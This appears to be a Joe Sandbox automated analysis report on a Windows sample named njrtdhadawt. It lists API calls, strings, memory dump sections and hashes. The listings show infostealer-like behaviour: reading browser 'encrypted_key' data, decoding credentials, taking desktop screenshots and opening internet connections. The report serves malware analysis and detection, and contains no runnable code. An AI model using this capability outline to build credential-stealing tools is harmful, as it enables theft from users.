• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
• String ID:
• API String ID: 1139693110-0
• Opcode ID: 1421e81c594acfa3fdd186d61f3e22c2636d381718280dd3ccf53d636949645f
• Instruction ID: c05e4df193b38fd2a88cf346fa60c6941cc2ef6ab6a73b3b642651b9a06f2af7
• Opcode Fuzzy Hash: 1421e81c594acfa3fdd186d61f3e22c2636d381718280dd3ccf53d636949645f
• Instruction Fuzzy Hash: FBC11732900109AFDF51BBA1ED4A8EE7B79BF14301F514025F701B7166DBBA6E06AF90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,771A83C0,00000000,00FFBFDD,?), ref: 00FFB2F7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,01015154), ref: 00FFB325
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.zip), ref: 00FFB335
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.zoo), ref: 00FFB341
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.arc), ref: 00FFB34D
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.lzh), ref: 00FFB359
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.arj), ref: 00FFB365
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.gz), ref: 00FFB371
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.tgz), ref: 00FFB37D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrlen
• String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
• API String ID: 1659193697-51310709
• Opcode ID: 17af65b81cee03dbe965f2d880e491cf6bc9cdf723c40b889a3502d13bdfd3ae
• Instruction ID: 4f933e8cf5bf808964542731e9ef946f4fd1a8607ef470fc4e872df71532037a
• Opcode Fuzzy Hash: 17af65b81cee03dbe965f2d880e491cf6bc9cdf723c40b889a3502d13bdfd3ae
• Instruction Fuzzy Hash: 06017525EC532FA15B222232DC55E7E2E5D8FC3FE47440519EA40EE068EBDC884375B2
APIs
  • Part of subcall function 6CD4A9E0: SetLastError.KERNEL32(00000000), ref: 6CD4AAA7
  • Part of subcall function 6CD4A9E0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CD4AAAF
  • Part of subcall function 6CD4A9E0: GetLastError.KERNEL32 ref: 6CD4AABB
  • Part of subcall function 6CD4A9E0: GetLastError.KERNEL32 ref: 6CD4AACD
• GetCurrentProcess.KERNEL32 ref: 6CD4DC12
• GetCurrentThread.KERNEL32 ref: 6CD4DC1B
• RtlCaptureContext.KERNEL32(?), ref: 6CD4DC3B
• GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6CD4DC7D
• GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6CD4DCA7
• GetCurrentProcess.KERNEL32 ref: 6CD4DCBC
• GetProcAddress.KERNEL32(StackWalkEx), ref: 6CD4DCDF
• ReleaseMutex.KERNEL32(?), ref: 6CD4DE01
• GetProcAddress.KERNEL32(StackWalk64), ref: 6CD4DF34
  • Part of subcall function 6CD1AC00: HeapFree.KERNEL32(00000000,0000000C), ref: 6CD4EBD8
Strings
• StackWalkEx, xrefs: 6CD4DCD4
• stack backtrace:, xrefs: 6CD4DB97
• SymFunctionTableAccess64, xrefs: 6CD4DC72
• SymGetModuleBase64, xrefs: 6CD4DC9C
• StackWalk64, xrefs: 6CD4DF29
• note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CD4DE28
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryFreeHeapMutexReleaseThread
• String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
• API String ID: 2896442597-500235477
• Opcode ID: 99ad8b1cad08acf21f2f89f1263d36b147815fb07c4ca711ae2c04d708c33f2e
• Instruction ID: 0b4084f880e067f63ea27422850da9bf7cb024210a3f577afda782219c2f371c
• Opcode Fuzzy Hash: 99ad8b1cad08acf21f2f89f1263d36b147815fb07c4ca711ae2c04d708c33f2e
• Instruction Fuzzy Hash: 38F118B5500B00DFE721CF25C945B93BBF4BB05708F10891DE6AA87AA1DB71B549CB61
APIs
• strtok_s.MSVCRT ref: 00FF37C7
• StrCmpCA.SHLWAPI(?,true), ref: 00FF3889
  • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
  • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
• lstrcpyA.KERNEL32(?,?), ref: 00FF394B
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF397C
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF39B8
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF39F4
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF3A30
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF3A6C
• lstrcpyA.KERNEL32(?,00000000), ref: 00FF3AA8
• strtok_s.MSVCRT ref: 00FF3B6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                          • Opcode ID: 277d730833c9b519a6dd3a84e4988a883d4c6e24e4e3937b7007c6b05de3468d
                                                                                                                                                                                                                                                          • Instruction ID: 63cc36099cb90757b61db3d95bdb3d4e952da4934930f8a7b1d568c215747574
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 277d730833c9b519a6dd3a84e4988a883d4c6e24e4e3937b7007c6b05de3468d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B1387680021C9FCB60EF55DC89AE977B9BF14300F0001E5EA49A7266EB75AF85EF40
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                          • String ID: block
                                                                                                                                                                                                                                                          • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                          • Opcode ID: d8e5aa81435c20382a1671c8f6e1b9507b99018f2856678f7176ffa6c9486bf1
                                                                                                                                                                                                                                                          • Instruction ID: f5cda09aab5c5357a8b48cfe8d2d810bbb866ff07fdc5ee2f5db86b88841afad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8e5aa81435c20382a1671c8f6e1b9507b99018f2856678f7176ffa6c9486bf1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC412FB1A4460EEFCB205F71EC49A7E7F68BF40B49B508429E742EA518E734A611EB50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CD52D19
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CD52D49
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CD52D7C
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6CD52DE1
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CD52E0A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                                                                          • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                                                                                                          • API String ID: 2190909847-1953985048
                                                                                                                                                                                                                                                          • Opcode ID: 8b6208bfa73736ebd6fb7dfac1978a265c11af9c9bdd5f5666560c0a5cebc774
                                                                                                                                                                                                                                                          • Instruction ID: a668a4a1ba0d88e82470fc974a9a2df9413c230d0e55ea10ed351eaa843fe225
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b6208bfa73736ebd6fb7dfac1978a265c11af9c9bdd5f5666560c0a5cebc774
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41A16270608781EBEB218F19C885BDBB7F8FF89318F40461DF69897260E772D5458B92
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5A22
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5A33
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00FF5A5E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5A7C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00FF5A90
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5AA3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE87ED: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8833
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF240A: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00FF5B39,?), ref: 00FF2415
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000), ref: 00FF5B47
                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00FF5C69
  • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
  • Part of subcall function 00FE8696: LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
  • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
  • Part of subcall function 00FE8696: LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
• lstrcatA.KERNEL32(?,00000000), ref: 00FF5BF5
• StrCmpCA.SHLWAPI(?,01015637), ref: 00FF5C12
• lstrcatA.KERNEL32(?,?), ref: 00FF5C31
• lstrcatA.KERNEL32(?,01015A74), ref: 00FF5C42
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
• String ID:
• API String ID: 4109952398-0
• Opcode ID: 01376aeb6a5f0744accc40adfa1c3aacc59d38c1e6791ee07d32ed401e5681ba
• Instruction ID: 43586fbd64a709da6f36c1259955fe695e2d8d6697c1ca35761a4d0ff3639890
• Opcode Fuzzy Hash: 01376aeb6a5f0744accc40adfa1c3aacc59d38c1e6791ee07d32ed401e5681ba
• Instruction Fuzzy Hash: B8712C72C0021D9FDF60DF24DC45ADAB7BABF98310F0445E5E608A3251EB369BA59F50
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FF21B9
• GetDesktopWindow.USER32 ref: 00FF21C7
• GetWindowRect.USER32(00000000,?), ref: 00FF21D4
• SelectObject.GDI32(?,00000000), ref: 00FF2201
• GetHGlobalFromStream.COMBASE(?,?), ref: 00FF226C
• GlobalLock.KERNEL32(?), ref: 00FF2275
• GlobalSize.KERNEL32(?), ref: 00FF2281
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE5474: lstrlenA.KERNEL32(?), ref: 00FE550B
  • Part of subcall function 00FE5474: StrCmpCA.SHLWAPI(?,010159C7,010159C6,010159C3,010159C2), ref: 00FE557A
  • Part of subcall function 00FE5474: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE559C
• SelectObject.GDI32(?,?), ref: 00FF22DF
• DeleteObject.GDI32(?), ref: 00FF22FA
• DeleteObject.GDI32(?), ref: 00FF2303
• ReleaseDC.USER32(00000000,00000000), ref: 00FF230B
• CloseWindow.USER32(00000000), ref: 00FF2312
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
• String ID:
• API String ID: 1802806997-0
• Opcode ID: b1b8791a8d2e1fc6d293ac4aac69a1d09fc8499f143b8516903854be70e2a675
• Instruction ID: 874a4d690d5af6738339d7d93fb499c87d48d678da5f54ecb025367c9e3c8a08
• Opcode Fuzzy Hash: b1b8791a8d2e1fc6d293ac4aac69a1d09fc8499f143b8516903854be70e2a675
• Instruction Fuzzy Hash: 2D51E37280011DAFDF21AFA4ED4D8EEBF79FF48324B008025FA01E2125DB359955EBA1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3833677464-0
                                                                                                                                                                                                                                                          • Opcode ID: ce53d4cff9f1dcb3a0d7abed448cf11e50c7d1aa652ec336a3e96af6f28d0277
                                                                                                                                                                                                                                                          • Instruction ID: 0fbd5c46e073876282d56688fbcb53ee87c61b264eae20f70529560291291874
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce53d4cff9f1dcb3a0d7abed448cf11e50c7d1aa652ec336a3e96af6f28d0277
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE210531508606AEF7237F68DC0196A7BE5FF96761F11842AF6C45A1E0EE3298008A56
APIs
  • Part of subcall function 00FE15AC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00FE15B6
  • Part of subcall function 00FE15AC: HeapAlloc.KERNEL32(00000000), ref: 00FE15BD
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00FE15F6
• GetLastError.KERNEL32 ref: 00FE15FC
• SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00FE1604
• GetWindowContextHelpId.USER32(00000000), ref: 00FE160B
• GetWindowLongW.USER32(00000000,00000000), ref: 00FE1613
• RegisterClassW.USER32(00000000), ref: 00FE161A
• IsWindowVisible.USER32(00000000), ref: 00FE1621
• ConvertDefaultLocale.KERNEL32(00000000), ref: 00FE1628
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FE1634
• IsDialogMessageW.USER32(00000000,00000000), ref: 00FE163C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00FE1646
• HeapFree.KERNEL32(00000000), ref: 00FE164D
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
